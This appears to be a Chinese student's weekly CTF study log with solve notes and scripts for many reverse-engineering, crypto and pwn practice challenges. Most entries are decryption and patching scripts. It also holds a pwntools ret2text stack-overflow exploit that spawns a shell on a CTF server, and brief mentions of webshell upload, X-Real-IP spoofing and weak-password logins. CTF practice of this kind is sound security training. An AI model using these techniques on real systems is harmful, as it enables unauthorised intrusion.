---
title: 0925-1015总结
date: 2023-10-14 17:17:22
tags: 周报
mathjax: true
---

# 0925-1015总结

## 09-25

### easy_RE(NewStarCTF2023)

打开就行，两段拼起来

### 咳(NewStarCTF2023)

脱壳，简单逆向

```c++
#include <cstdio>
#include <cstring>
using namespace std;
char str[]="gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~";
int len;
int main(void){
    len=strlen(str);
    for(register int i=0;i<len;i++){
        str[i]--;
        printf("%c",str[i]);
    };
    return 0;
};
```

### （疑问）ELF(NewStarCTF2023)

base64解码，简单逆向

```c
#include <cstdio>
#include <cstring>
using namespace std;
char str[]="V\\QWkt .$_e.'^_g.gXQ'.u|v.!c/m";
int len;
int main(void){
    len=strlen(str);
    for(register int i=0;i<len;i++)
        str[i]=(str[i]-16)^32;
    for(register int i=0;i<len;i++)
        printf("%c",str[i]);
    return 0;
};
```

*疑问* 不知道为啥输出"flag{D0>4ou>7now>wha7>ELF>1s?}"，把'>'换成'_'就对了

### （疑问）Segments(NewStarCTF2023)

F7看segments

*疑问* 啥是段？出题咋出？

### AndroXor(NewStarCTF2023)

简单apk逆向

### Endian(NewStarCTF2023)

简单逆向，注意小端，每4个反转

### CyberChef's Secret(NewStarCTF2023)

杂项题，略

### 机密图片(NewStarCTF2023)

杂项题，略

### 流量！鲨鱼！(NewStarCTF2023)

杂项题，略

### 压缩包们(NewStarCTF2023)

杂项题，略

### 空白格(NewStarCTF2023)

杂项题，略

### 隐秘的眼睛(NewStarCTF2023)

杂项题，略

### 泄漏的秘密(NewStarCTF2023)

web题，略

### Begin of Upload(NewStarCTF2023)

web题，传一句话木马

### Begin of HTTP(NewStarCTF2023)

web题，X-Real-IP:127.0.0.1 本地

### ErrorFlask(NewStarCTF2023)

web题，报错查flag

## 09-26

### lazy_activtiy(NewStarCTF2023)

感觉这200分不太值...

找到flag地址，搜索资源文件，得flag

### brainfuck(NewStarCTF2023)

密码题，略

### Caesar's Secert(NewStarCTF2023)

密码题，略

### Fence(NewStarCTF2023)

密码题，略

### Vigenère(NewStarCTF2023)

密码题，略

### babyxor(NewStarCTF2023)

密码题，略

### ret2text(NewStarCTF2023)

pwn题，但是得记笔记

```python
from pwn import *
context(arch='amd64',log_level = 'debug',os = 'linux')
# p=process('./ret2text')
# p=gdb.debug('./ret2text')
p=remote("node4.buuoj.cn",27475)
add=0x0000000000401212 #/bin/sh所在的地址，注意参数位置
payload=b'a'*(0x20+8)+p64(add)#0x20为数组长度，8为64bit
p.sendafter('Show me your magic',payload)
# re.sendline(b'ls /')
p.interactive()
```

## 09-27

一整天学汇编，没有做题

## 09-28

放松一下：大英作业

## 09-29

放松一下：线性代数作业

放弃汇编：中断太抽象了

### [HGAME 2023 week1]test your IDA

水题

### [HNCTF 2022 WEEK2]来解个方程?

简单z3，就是比较费手

### [HNCTF 2022 WEEK3]Double

**双进程**

```cpp
pipe(pipedes);//不同进程间传参，pipedes[0]为出口，pipedes[1]为入口
if(fork()){
    //后执行
    close(pipedes[1]);
    read(pipedes[0],&buf,1uLL);
    close(pipedes[0]);
}
else{
    //先执行
    close(pipedes[0]);
    write(pipedes[1],&s[j],1uLL);
    close(pipedes[1]);
};
```

几分钟整了一个脚本把数据段dump出来：

```cpp
//把定义复制过来，去掉换行，要转成十六进制，没有h的0转不出来，dup要自己删掉自己改
#include <cstdio>
#include <iostream>
#include <string>
using namespace std;
string map;
int chk;
int main(void){
    getline(cin,map);
    printf("\n\n\n");
    for(register int i=0;i<map.length();i++)
        if(map[i]=='h'){
            chk=0;
            for(register int j=1;j<=8;j++)
                if(!(((map[i-j]>=48)&&(map[i-j]<=57))||((map[i-j]>=65)&&(map[i-j]<=70)))){
                    chk=j;
                    break;
                };
            printf("0x");
            for(register int j=i-chk+1;j<=i-1;j++)
                printf("%c",map[j]);
            printf(",");
        };
    return 0;
};
```

exp:

```python
enc=[0x1FAC,0x4F91,0x3796,0x0B584,0x0E18,0x0C1E2,0x7370,0x1FAC,0x0A880,0x0B8F1,0x233B,0x7370,0x27B8,0x4F91,0x0EB08,0x8BAC,0x5900,0x3081,0x4E1A,0x599D,0x5BE3,0x5C49,0x0F53B,0x0FFDA,0x0BA6F,0x3E5D,0x27B8,0x5B51,0x8A30,0x2A10]
arr=[0x3C0E,0x0C68C,0x4EE7,0x7BD6,0x0C318,0x0CF83,0x0EB1D,0x304F,0x0FF00,0x2C3A,0x666D,0x6798,0x0D015,0x1E56,0x562A,0x8A81,0x5C95,0x78A0,0x60ED,0x1114,0x0ADDB,0x732C,0x5190,0x1135,0x0E353,0x0E9C9,0x0AAF,0x2818,0x2636,0x9B26,0x3D09,0x18BF,0x2A64,0x4F3D,0x0AE5F,0x4E1A,0x496A,0x0DB84,0x24C3,0x0FFDA,0x378B,0x1F5E,0x0D071,0x8C71,0x62E,0x0D6D9,0x8F74,0x0E856,0x0EA45,0x0BEC4,0x486,0x0F140,0x729A,0x7FFD,0x0AFED,0x5F38,0x6FC,0x4BBD,0x3322,0x64DE,0x458F,0x8A30,0x7514,0x8BAC,0x0B584,0x0B8F1,0x72BC,0x0C1E2,0x0B0B0,0x5C49,0x0ABBF,0x539B,0x0DBD0,0x0DAC,0x0EB08,0x5BE3,0x3B32,0x0D535,0x1FAC,0x0FB63,0x0E18,0x3796,0x4F91,0x6644,0x97A8,0x0E06,0x0FB99,0x0A880,0x0C982,0x889B,0x4F89,0x3FE4,0x0EE7E,0x0BE7,0x8ACD,0x3208,0x2A10,0x6332,0x2AD6,0x3D0,0x0F53B,0x5900,0x16E,0x0F928,0x5B51,0x27B8,0x0BEEF,0x233B,0x17E,0x63F0,0x0C025,0x0E51D,0x3D44,0x6F36,0x16F9,0x3081,0x705F,0x0B776,0x599D,0x4EDC,0x6557,0x0BE16,0x8F0E,0x0BA6F,0x3E5D,0x7370,0x1746,0x6C0C,0x712B,0x5CBB,0x6359,0x8CAF,0x4ED7,0x0AEC8,0x0FBA7,0x74BD,0x0E3B1,0x5D37,0x4D4E,0x8104,0x0B410,0x8656,0x2176,0x23BB,0x245E,0x0A92E,0x0AD1A,0x0E530,0x0D77C,0x0E043,0x9116,0x0EDDC,0x0AB12,0x0D67,0x7685,0x3CB9,0x0BFCE,0x5A2B,0x39F9,0x908B,0x0FE3E,0x0BD18,0x0DB54,0x0CAB,0x3C56,0x0FE73,0x0D974,0x0F08,0x5B88,0x0A0F2,0x3D88,0x9DE4,0x935,0x52B4,0x0A340,0x0EA88,0x0BE72,0x6DCE,0x6A2B,0x3146,0x358,0x0F4F,0x0FA60,0x25EB,0x0DAC7,0x76A,0x3D67,0x43F0,0x9F9C,0x5B66,0x7163,0x8F3B,0x7EBB,0x5D1,0x62C4,0x9F95,0x1E06,0x5D58,0x0E984,0x75B3,0x0D5F,0x0EE58,0x2390,0x0FB91,0x28AA,0x87DD,0x0F5EA,0x443C,0x6742,0x1999,0x88E9,0x0FD0E,0x0C8BD,0x55F8,0x0BB09,0x6C10,0x8068,0x0CDD4,0x29A6,0x0DD9F,0x0CEC3,0x6217,0x0BE28,0x3E7A,0x0E71E,0x0C573,0x42B,0x0DE06,0x0C934,0x35D1,0x0EF49,0x63A3,0x0F08F,0x26E1,0x0E61E,0x2710,0x0B6B3,0x10E0,0x0BD36,0x499C,0x8446,0x0B614,0x0E921,0x0DB2D,0x4AB8,0x4C8B,0x0D1A8,0x6A9B,0x0D817,0x0F349,0x0CE92,0x7F8D,0x4C66,0x0CF40,0x9169,0]
for i in range(30):
    tmp=arr.index(enc[i])^i
    print(chr(tmp),end='')
```

### [HGAME 2023 week2]before_main

sub_12EB()为base64编码，qword_4020为表，交叉引用发现表被sub_1228()篡改，原因是init()中off_3D78有dq offset sub_1228+1

### （不会）[HGAME 2023 week1]easyasm

*不会* 明明学完了汇编但还是不会做

### （不会）[CISCN 2023 初赛]babyRE

*不会* 打开网站发现和wp中说的不一样

### [watevrCTF 2019]Timeout

发现.com文件幻数是elf，改后缀，找generate

### [GKCTF 2020]Check_1n

难度可能很大，但是我随便找了个字符串发现是base58？？？

### [SWPUCTF 2022 新生赛]py1

水题

### [SWPUCTF 2022 新生赛]贪吃蛇

简单逆向

## 09-30

### （不会）[LitCTF 2023]For Aiur

*不会* python逆向，Magic Number不会修

本地只有python3.7，编译版本为python3.8

```
Known values:
#  Python 1.5:   20121
#  Python 1.5.1: 20121
#     Python 1.5.2: 20121
#     Python 1.6:   50428
#     Python 2.0:   50823
#     Python 2.0.1: 50823
#     Python 2.1:   60202
#     Python 2.1.1: 60202
#     Python 2.1.2: 60202
#     Python 2.2:   60717
#     Python 2.3a0: 62011
#     Python 2.3a0: 62021
#     Python 2.3a0: 62011 (!)
#     Python 2.4a0: 62041
#     Python 2.4a3: 62051
#     Python 2.4b1: 62061
#     Python 2.5a0: 62071
#     Python 2.5a0: 62081 (ast-branch)
#     Python 2.5a0: 62091 (with)
#     Python 2.5a0: 62092 (changed WITH_CLEANUP opcode)
#     Python 2.5b3: 62101 (fix wrong code: for x, in ...)
#     Python 2.5b3: 62111 (fix wrong code: x += yield)
#     Python 2.5c1: 62121 (fix wrong lnotab with for loops and
#                          storing constants that should have been removed)
#     Python 2.5c2: 62131 (fix wrong code: for x, in ... in listcomp/genexp)
#     Python 2.6a0: 62151 (peephole optimizations and STORE_MAP opcode)
#     Python 2.6a1: 62161 (WITH_CLEANUP optimization)
#     Python 2.7a0: 62171 (optimize list comprehensions/change LIST_APPEND)
#     Python 2.7a0: 62181 (optimize conditional branches:
#                          introduce POP_JUMP_IF_FALSE and POP_JUMP_IF_TRUE)
#     Python 2.7a0  62191 (introduce SETUP_WITH)
#     Python 2.7a0  62201 (introduce BUILD_SET)
#     Python 2.7a0  62211 (introduce MAP_ADD and SET_ADD)
#     Python 3000:   3000
#                    3010 (removed UNARY_CONVERT)
#                    3020 (added BUILD_SET)
#                    3030 (added keyword-only parameters)
#                    3040 (added signature annotations)
#                    3050 (print becomes a function)
#                    3060 (PEP 3115 metaclass syntax)
#                    3061 (string literals become unicode)
#                    3071 (PEP 3109 raise changes)
#                    3081 (PEP 3137 make __file__ and __name__ unicode)
#                    3091 (kill str8 interning)
#                    3101 (merge from 2.6a0, see 62151)
#                    3103 (__file__ points to source file)
#     Python 3.0a4: 3111 (WITH_CLEANUP optimization).
#     Python 3.0b1: 3131 (lexical exception stacking, including POP_EXCEPT
                          #3021)
#     Python 3.1a1: 3141 (optimize list, set and dict comprehensions:
#                         change LIST_APPEND and SET_ADD, add MAP_ADD #2183)
#     Python 3.1a1: 3151 (optimize conditional branches:
#                         introduce POP_JUMP_IF_FALSE and POP_JUMP_IF_TRUE
                          #4715)
#     Python 3.2a1: 3160 (add SETUP_WITH #6101)
#                   tag: cpython-32
#     Python 3.2a2: 3170 (add DUP_TOP_TWO, remove DUP_TOPX and ROT_FOUR #9225)
#                   tag: cpython-32
#     Python 3.2a3  3180 (add DELETE_DEREF #4617)
#     Python 3.3a1  3190 (__class__ super closure changed)
#     Python 3.3a1  3200 (PEP 3155 __qualname__ added #13448)
#     Python 3.3a1  3210 (added size modulo 2**32 to the pyc header #13645)
#     Python 3.3a2  3220 (changed PEP 380 implementation #14230)
#     Python 3.3a4  3230 (revert changes to implicit __class__ closure #14857)
#     Python 3.4a1  3250 (evaluate positional default arguments before
#                        keyword-only defaults #16967)
#     Python 3.4a1  3260 (add LOAD_CLASSDEREF; allow locals of class to override
#                        free vars #17853)
#     Python 3.4a1  3270 (various tweaks to the __class__ closure #12370)
#     Python 3.4a1  3280 (remove implicit class argument)
#     Python 3.4a4  3290 (changes to __qualname__ computation #19301)
#     Python 3.4a4  3300 (more changes to __qualname__ computation #19301)
#     Python 3.4rc2 3310 (alter __qualname__ computation #20625)
#     Python 3.5a1  3320 (PEP 465: Matrix multiplication operator #21176)
#     Python 3.5b1  3330 (PEP 448: Additional Unpacking Generalizations #2292)
#     Python 3.5b2  3340 (fix dictionary display evaluation order #11205)
#     Python 3.5b3  3350 (add GET_YIELD_FROM_ITER opcode #24400)
#     Python 3.5.2  3351 (fix BUILD_MAP_UNPACK_WITH_CALL opcode #27286)
#     Python 3.6a0  3360 (add FORMAT_VALUE opcode #25483)
#     Python 3.6a1  3361 (lineno delta of code.co_lnotab becomes signed #26107)
#     Python 3.6a2  3370 (16 bit wordcode #26647)
#     Python 3.6a2  3371 (add BUILD_CONST_KEY_MAP opcode #27140)
#     Python 3.6a2  3372 (MAKE_FUNCTION simplification, remove MAKE_CLOSURE
#                         #27095)
#     Python 3.6b1  3373 (add BUILD_STRING opcode #27078)
#     Python 3.6b1  3375 (add SETUP_ANNOTATIONS and STORE_ANNOTATION opcodes
#                         #27985)
#     Python 3.6b1  3376 (simplify CALL_FUNCTIONs & BUILD_MAP_UNPACK_WITH_CALL
                          #27213)
#     Python 3.6b1  3377 (set __class__ cell from type.__new__ #23722)
#     Python 3.6b2  3378 (add BUILD_TUPLE_UNPACK_WITH_CALL #28257)
#     Python 3.6rc1 3379 (more thorough __class__ validation #23722)
#     Python 3.7a1  3390 (add LOAD_METHOD and CALL_METHOD opcodes #26110)
#     Python 3.7a2  3391 (update GET_AITER #31709)
#     Python 3.7a4  3392 (PEP 552: Deterministic pycs #31650)
#     Python 3.7b1  3393 (remove STORE_ANNOTATION opcode #32550)
#     Python 3.7b5  3394 (restored docstring as the first stmt in the body;
#                         this might affected the first line number #32911)
#     Python 3.8a1  3400 (move frame block handling to compiler #17611)
#     Python 3.8a1  3401 (add END_ASYNC_FOR #33041)
#     Python 3.8a1  3410 (PEP570 Python Positional-Only Parameters #36540)
#     Python 3.8b2  3411 (Reverse evaluation order of key: value in dict
#                         comprehensions #35224)
#     Python 3.8b2  3412 (Swap the position of positional args and positional
#                         only args in ast.arguments #37593)
#     Python 3.8b4  3413 (Fix "break" and "continue" in "finally" #37830)
```

例如：

3413就是Python 3.8b4的Magic Number，执行后可以得到0x0A0D0D55，则对应二进制码是55 0D 0D 0A，Python3.3以下的版本中，只有Magic Number和四位时间戳，Python3.3到Python3.7（不包含3.7）版本中，只有Magic Number和八位时间戳 + 大小信息，Python3.7及以上版本的编译后二进制文件中，头部除了四字节Magic Number，还有四个字节的空位和八个字节的时间戳 + 大小信息，后者对文件反编译没有影响，全部填充0即可。

可得对照表：

```c++
enum PycMagic {
    MAGIC_1_0 = 0x00999902,
    MAGIC_1_1 = 0x00999903, /* Also covers 1.2 */
    MAGIC_1_3 = 0x0A0D2E89,
    MAGIC_1_4 = 0x0A0D1704,
    MAGIC_1_5 = 0x0A0D4E99,
    MAGIC_1_6 = 0x0A0DC4FC,

    MAGIC_2_0 = 0x0A0DC687,
    MAGIC_2_1 = 0x0A0DEB2A,
    MAGIC_2_2 = 0x0A0DED2D,
    MAGIC_2_3 = 0x0A0DF23B,
    MAGIC_2_4 = 0x0A0DF26D,
    MAGIC_2_5 = 0x0A0DF2B3,
    MAGIC_2_6 = 0x0A0DF2D1,
    MAGIC_2_7 = 0x0A0DF303,

    MAGIC_3_0 = 0x0A0D0C3A,
    MAGIC_3_1 = 0x0A0D0C4E,
    MAGIC_3_2 = 0x0A0D0C6C,
    MAGIC_3_3 = 0x0A0D0C9E,
    MAGIC_3_4 = 0x0A0D0CEE,
    MAGIC_3_5 = 0x0A0D0D16,
    MAGIC_3_5_3 = 0x0A0D0D17,
    MAGIC_3_6 = 0x0A0D0D33,
    MAGIC_3_7 = 0x0A0D0D42,
    MAGIC_3_8 = 0x0A0D0D55,
    MAGIC_3_9 = 0x0A0D0D61,
};
```

写成速查脚本：

```python
rd=input('Input Magic Number (ex. 3413):')
MAGIC_NUMBER = (int(rd)).to_bytes(2, 'little') + b'\r\n'
_RAW_MAGIC_NUMBER = int.from_bytes(MAGIC_NUMBER, 'little')
print(hex(_RAW_MAGIC_NUMBER))
```

### [HNCTF 2022 WEEK2]Packet

简单题

### [MTCTF 2021]Random

**动态调试**

第二个rand()处下断点，rand()的返回值存入EAX，然后取AL进行XOR。F9调试，div处被0除忽略。F9运行到断点，F8步过，得每次rand()即为EAX低8位。

```python
random=[0x58,0xa1,0xCB,0xE9,0xED,0x2C,0xEC,0xFB,0xE9,0xC4,0x16,0x97,0x99,0xb1,0xa4,0xe9,0xc3,0xc6,0x80,0xBF,0x3e,0x44,0x18,0x2e,0x73,0x56,0x52,0xB8,0x5B,0x66,0xED,0xBC,0x8a,0xd8,0x36,0x8f,0xe6,0xd3,0xb1,0x51,0xb9,0x59,0xd3,0x5a]
ans=[0x3E, 0xCD, 0xAA, 0x8E, 0x96, 0x1F, 0x89, 0xCD, 0xDB, 0xF1, 0x70, 0xF2, 0xA9, 0x9C, 0xC2, 0x8B, 0xF2, 0xFE, 0xAD, 0x8B, 0x58, 0x7C, 0x2F, 0x03, 0x4A, 0x65, 0x31, 0x89, 0x76, 0x57, 0x88, 0xDF, 0xB8, 0xE9, 0x01, 0xE9, 0xDE, 0xE5, 0x86, 0x68, 0x8F, 0x24, 0xD3, 0x5A]
flag=[]
for i in range(len(ans)):
    flag.append(chr(random[i]^ans[i]))
ot="".join(flag)
print(ot)
```

### [HNCTF 2022 WEEK2]getflag

**动态调试** 把99999999patch成1，F9运行

### [MoeCTF 2022]begin

简单题

### （不会）[zer0pts 2020]easy strcmp

*不会* GOT劫持

### [CISCN 2022 东北]crackme_Android

Android逆向，256位分段md5爆破，风扇嘎嘎响

## 10-01

### [GXYCTF 2019]luck_guy

```python
sol=[0x7F,0x66,0x6F,0x60,0x67,0x75,0x63,0x69][::-1]
print('GXY{do_not_',end='')
for i in range(len(sol)):
    if i%2==1:
        sol[i]-=2
    else:
        sol[i]-=1
    print(chr(sol[i]),end='')
```

### [Week 1] 数字筑基(0xGame 2023)

### [Week 1] 代码金丹(0xGame 2023)

### [Week 1] 网络元婴(0xGame 2023)

### [Week 1] 虚拟化神(0xGame 2023)

### [Week 1] 赛博天尊(0xGame 2023)

### base_64(MoeCTF 2023)

### Reverse入门指北(MoeCTF 2023)

### UPX!(MoeCTF 2023)

### Xor(MoeCTF 2023)

###  ANDROID(MoeCTF 2023)

## 10-02

### [WEEK1]签到题(SHCTF2023)

basecrack一把梭

### [WEEK1]可爱的派蒙捏(SHCTF2023)

binwalk发现两个txt，对比得

### [WEEK1]message(SHCTF2023)

ctfcracktool转字符串得

### [WEEK1] 真的签到(SHCTF2023)

关注公众号得（再取消关注

### [WEEK1]Crypto_Checkin(SHCTF2023)

basecrack一把梭

### [WEEK1]凯撒大帝(SHCTF2023)

凯撒密码，ctfcracktool找flag

### [WEEK1]okk(SHCTF2023)

Okk!语言在线解密

### [WEEK1]熊斐特(SHCTF2023)

搜索熊斐特得该密码种类，在线解密

### [WEEK1]迷雾重重(SHCTF2023)

01改.-莫斯解码

### [WEEK1]小兔子可爱捏(SHCTF2023)

Rabbit密码，密钥上网搜为42

### [WEEK1]nc(SHCTF2023)

打开cat flag即可

### [WEEK1]登录就给flag(SHCTF2023)

弱口令 admin password尝试

### [WEEK1]飞机大战(SHCTF2023)

看js代码，找到unicode解码，再basecrack解码

### [WEEK1]ez_asm(SHCTF2023)

汇编代码阅读，先异或，在做减法，猜测可得c语言代码

### [WEEK1]easy_re(SHCTF2023)

ida打开即可看到

### [WEEK1]seed(SHCTF2023)

ida动态调试，在rand()处下断点，重复10遍记录edx，再xor得flag

### [WEEK1]signin(SHCTF2023)

打开就有

### [WEEK1]easy_math(SHCTF2023)

六元一次方程组解密，用z3得，再转16进制

### [WEEK1]请对我使用社工吧(SHCTF2023)

k1sme4来自东营市东营区，全东营就石油大学...（还有技校和大专

### [WEEK1]hard nc(SHCTF2023)

.gift为第一部分 cd进入gift2找flag2为第二部分，base解码

### [WEEK1]what is m(SHCTF2023)

直接16进制转字符串即可

### [WEEK1]really_ez_rsa(SHCTF2023)

```python
import libnum,gmpy2
p = ...
#省略...
d=gmpy2.invert(e,(p-1)*(q-1))
n=p*q
m=pow(c,d,n)
print(libnum.n2s(int(m)))
```

### [WEEK1]残缺的md5(SHCTF2023)

```python
import hashlib
md=hashlib.md5()
apb="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
for t1 in apb:
    for t2 in apb:
        for t3 in apb:
            ast='KCLWG'+t1+'K8M9O3'+t2+'DE'+t3+'84S9'
            md=hashlib.md5()
            md.update(ast.encode('utf-8'))
            if(str(md.hexdigest())[-7:]=='b2ac4e6'):
                print(ast)
                print(str(md.hexdigest()))
```

## 10-03

### [HNCTF 2022 WEEK2]Easy_Android

android-md5加密和一些小操作

### [HDCTF 2023]enc

TEA解密exp：

```c++
#include <cstdio>
using namespace std;
unsigned int v5,v6;
int sum,a2[4]={18,52,86,120};
int main(void){
    v6=0x60fcdef7,
    v5=0x236dbec,
    sum=-0xc3910c8e0;
    for(register int i=0;i<32;i++)
        v5-=(a2[3]+(v6>>5))^(sum+v6)^(a2[2]+(v6<<4)),
        v6-=(a2[1]+(v5>>5))^(sum+v5)^(a2[0]+(v5<<4)),
        sum+=0x61c88647;
    printf("%d\n",v6);
    return 0;
};
```

得smc加密方式为$\oplus3$，由程序可知加密为.hdctf部分，可知section size为0x1600

idapython exp为：

```python
import idc
for i in range(0x41d000,0x41e600):
    patch_byte(i,get_wide_byte(i)^3)
```

新建函数，得rc4加密，exp：

```python
import re
def rc4_decrypt(ciphertext,key):
    S=list(range(256))
    j=0
    res=[]
    #初始化S
    for i in range(256):
        j=(j+S[i]+key[i%len(key)])%256
        S[i],S[j]=S[j],S[i]
    #解密
    i=j=0
    for char in ciphertext:
        i=(i+1)%256
        j=(j+S[i])%256
        S[i],S[j]=S[j],S[i]
        res.append(char^S[(S[i]+S[j])%256])
    return bytes(res)
s = """
mov     [ebp+var_2C], 0Fh
...
"""
pattern=r',\s*(\S+)h'
data_list=re.findall(pattern,s)
data_list=['0x'+x for x in data_list]
data_list=[int(j,16) for j in data_list]
key='you_are_master'
key_list=[ord(c) for c in key]
flag=rc4_decrypt(data_list,key_list)
print(flag)
```

得flag

### [SWPUCTF 2022 新生赛]pypy

rc4加密，原文随便塞个长的，拿生成的密钥流解密，exp就不放了...

rc4加密流程长这样：

```
初始化S和T：
for i=0 to do
	S[i]=i;
	T[i]=K[i mod keylen];

初始排列S：
j=0;
for i=0 to 255 do
	j = (j+S[i]+T[i]mod256;
	swap(S[i],S[j];
	
生成密钥流，利用密钥流和明文进行加密：
i,j=0;
for r=0 to len do //r为明文长度，r字节
	i=(i+1)mod 256;
	j=(j+S[i])mod 256;
	swap(S[i],S[j]);
	t=(S[i]+S[j])mod 256;
	K[r]=S[t];
	data[r]^=K[r];
```

### [HGAME 2023 week1]easyenc

难度不大的加密，两个坑点

* c语言有溢出...chr()之前要\&0xFF
* DIE查壳为LE字节序...每4位反一下

## 10-04

### [长城杯 2021 政企组]魔鬼凯撒的RC4茶室

第一部分：自定义凯撒加密

第二部分：需要从给定的两个文件中通过凯撒和rc4恢复key，发现key找不到定义...

放弃rc4逆向，直接调试得key[0]地址esp+f4h，发现为0xde，exp：

```python
key=0xde
enc=[0x0d,0x0a,0xb2,0xbf,0xb9,0xa5,0xa6,0xef,0xbf,0xb1,0xb3,0xef,0xb0,0xb9,0x81,0xef,0xad,0x81,0xed,0xb1,0x81,0xbb,0xbf,0xad,0xa7,0x81]
for i in enc:
    print(chr((i^key)&0xff),end='')
```

### [MoeCTF 2021]welcome_to_the_world_of_re

题目没啥问题...

为啥我把一个ida窗口放在分屏上，有时候ida会卡退？？？

### （不会）[SWPUCTF 2021 新生赛]简单的逻辑

*不会* ---没有逻辑

### [强网杯 2022]GameMaster

DIE查壳为.NET，用dnSpy-x86打开，发现gamemessage被传入memory中。Ctrl+Shift+R查引用，在goldFunc中发现可疑函数。genCode()中为AES-PKCS7加密，发现没什么实质作用。

捋清思路：把gamemessage文件先$\oplus34$再AES-ECB

exp：

```python
from Crypto.Cipher import AES
key=b'Brainstorming!!!'
block_size=16
cipher=AES.new(key,AES.MODE_ECB)
with open('D://CTF-Workbench//gamemessage','rb') as f:
    ciphertext=f.read()
ciphertext=bytes([byte^34 for byte in ciphertext])
plaintext=cipher.decrypt(ciphertext)
with open('D://CTF-Workbench//data','wb') as f:
    f.write(plaintext)
```

得解密后gamemessage，010Editor打开，找MZ文件头，前面全删掉，DIE查壳为.NET，改名.dll，丢dnSpy-x86，发现他很复杂...

第一步尝试z3爆破：

```python
from z3 import *
x,y,z=BitVecs('x y z',64)
s=Solver()
KeyStream=[0]*40
key1=[101,5,80,213,163,26,59,38,19,6,173,189,198,166,140,183,42,247,223,24,106,20,145,37,24,7,22,191,110,179,227,5,62,9,13,17,65,22,37,5]
num=-1
for i in range(320):
    x=(((x>>29^x>>28^x>>25^x>>23)&1)|x<<1)
    y=(((y>>30^y>>27)&1)|y<<1)
    z=(((z>>31^z>>30^z>>29^z>>28^z>>26^z>>24)&1)|z<<1)
    if i%8==0:
        if i!=0:
            s.add(KeyStream[num]==key1[num])
        num+=1
    KeyStream[num]=(KeyStream[num]<<1)|(((z>>32&1&(x>>30&1))^(((z>>32&1)^1)&(y>>31&1))))
print(s.check())
print(s.model())
```

第二部照猫画虎：

```python
l=[156324965,868387187,3131229747]
arr=[0]*12
for i in range(3):
    for j in range(4):
        arr[i*4+j]=(l[i]>>j*8)&0xff
enc=[60,100,36,86,51,251,167,108,116,245,207,223,40,103,34,62,22,251,227]
for i in range(len(enc)):
    print(chr(enc[i]^arr[i%len(arr)]),end='')
```

### [HNCTF 2022 WEEK4]checker

**JS逆向**

只是想复杂了...

### [柏鹭杯 2021]baby_python

pyinstxtractor发现被加密，反编译pyimod00_crypto_key.pyc，取得密钥，反编译pyimod02_archive.pyc，发现加密逻辑为zlib加密，exp：

```python
inf=open(r'...\baby_python.baby_core.pyc.encrypted','rb')
c=Cipher()
buf=c.decrypt(inf.read())
buf=zlib.decompress(buf)
out=open(r'...\baby_python.baby_core.pyc','wb')
out.write(buf)
print('written down %d bytes'%len(buf))
inf.close()
out.close()
```

反汇编，用z3+md5解决

### [GFCTF 2021]wordy

**花指令**

> There are moments in life when you miss someone so much that you just want to pick them from your dreams and hug them for real! Dream what you want to dream;go where you want to go;be what you want to be,because you have only one life and one chance to do all the things you want to do.
> May you have enough happiness to make you sweet,enough trials to make you strong,enough sorrow to keep you human,enough hope to make you happy? Always put yourself in others'shoes.If you feel that it hurts you,it probably hurts the other person, too.

发现花指令，exp：

```python
import idc
for i in range(0x1135,0x3100):
    if (get_wide_byte(i)==0xeb)and(get_wide_byte(i+1)==0xff):
        patch_byte(i,0x90)
```

反汇编发现没有flag，原来是jz走了...，patch为0x90，得flag

### [BJDCTF 2020]Easy

flag在\_ques里面，感觉_time没啥用，patch成\_ques动调...

## 10-05

被拉去做了一堆Misc、Crypto、Web...不写了

## 10-06~10-14

比赛比较多：SHCTF-Week1、SHCTF-Week2、BalsnCTF、SunshineCTF、0xgame-Week2、Newstar-Week2、PKU-Geekgame、SWPU-NSS、ISITDTU、西部大学生信息素养大赛、二面、Wiley

### [MoeCTF 2022]D_flat

C#程序，把.dll丢进IDA，简单C#逆向
